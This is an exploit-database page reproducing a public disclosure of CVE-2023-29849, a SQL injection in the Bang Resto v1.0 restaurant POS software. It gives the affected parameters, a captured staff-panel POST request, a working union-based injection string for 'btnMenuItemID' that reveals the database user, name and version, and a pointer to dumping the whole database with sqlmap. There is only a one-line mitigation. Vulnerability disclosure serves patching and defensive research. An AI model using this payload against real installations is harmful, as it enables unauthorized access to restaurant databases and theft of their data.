header-logo
Suggest Exploit
vendor:
Bang Resto
by:
Rahad Chowdhury
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Bang Resto
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2023-29849
CPE: a:hockeycomputindo:bang_resto:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10, PHP 7.4.29, Apache 2.4.53
2023

Bang Resto v1.0 – ‘Multiple’ SQL Injection

Bang Resto v1.0 is vulnerable to multiple SQL Injection attacks. An attacker can inject malicious SQL queries into the 'btnMenuItemID' parameter to gain access to user, database and version information. An attacker can also use sqlmap to dump the entire database by saving the web request from BurpSuite.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in a SQL query.
Source

Exploit-DB raw data:

# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage:
https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link:
https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29849

*Affected Parameters:*
btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],
itemqty[], btnMenuItemID

*Steps to Reproduce:*
1. First login your staff panel.
2. then go to "order" menu and Select menu then create order and intercept
request data using burp suite.
so your request data will be:

POST /bangresto/staff/displayitem.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 194
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/staff/order.php
Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5
Connection: close

btnMenuItemID=1&qty=1

3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based
SQL Injection use this query ".1 union select
1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())--
-" in "btnMenuItemID" parameter.
4. Check browser you will see user, database and version informations.
5. You could also use sqlmap to dump the whole database by saving the web request from BurpSuite

Navigation

Suggest Exploit

Services By CQR